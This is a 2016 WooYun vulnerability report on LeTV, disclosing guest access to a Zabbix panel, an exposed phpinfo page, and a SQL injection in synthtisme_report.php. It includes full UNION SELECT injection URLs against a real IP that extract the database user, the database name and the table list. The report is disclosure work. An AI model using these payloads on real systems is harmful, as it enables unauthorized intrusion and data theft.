当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0206153

漏洞标题:乐视某处一处SQL注入+未授权访问

相关厂商:乐视网

漏洞作者: DloveJ

提交时间:2016-05-08 09:59

修复时间:2016-06-22 10:50

公开时间:2016-06-22 10:50

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已经确认,细节仅向厂商公开
2016-05-18: 细节向核心白帽子及相关领域专家公开
2016-05-28: 细节向普通白帽子公开
2016-06-07: 细节向实习白帽子公开
2016-06-22: 细节向公众公开

简要描述:

乐视某处一处注入+未授权访问

详细说明:

#1
http://115.182.92.226/zabbix/
允许访客访问

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


7.jpg


8.jpg


9.jpg


9.jpg


11.jpg


#2 注入

12.jpg


尝试注入

http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=not+selected&module=all&local=all&groups=ALLHOSTS&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2


参数groups business local

http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=all&module=all&local=all&groups=-Mysql%E5%BA%94%E7%94%A8%27%20union%20select%201,2,3,user(),database()%23%20and%20%27%%27=%27%&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2


13.jpg


view-source:http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=all&module=all&local=all&groups=-Mysql%E5%BA%94%E7%94%A8%27%20union%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables%20where%20table_schema=%27zabbix%27%23%20and%20%27%%27=%27%&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2


14.jpg


#3 phpinfo

http://115.182.92.226/phpinfo.php


15.jpg

漏洞证明:

user:web_zabbix@10.200.84.58
db:zabbix

修复方案:

限制guest

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-05-08 10:43

厂商回复:

感谢对乐视安全的关注,内部扫描器已经发现了该漏洞。请给我们一点时间来推进开发修复,甲方的童鞋应该都明白推进漏洞修复的难度……

最新状态:

暂无


漏洞评价:

评价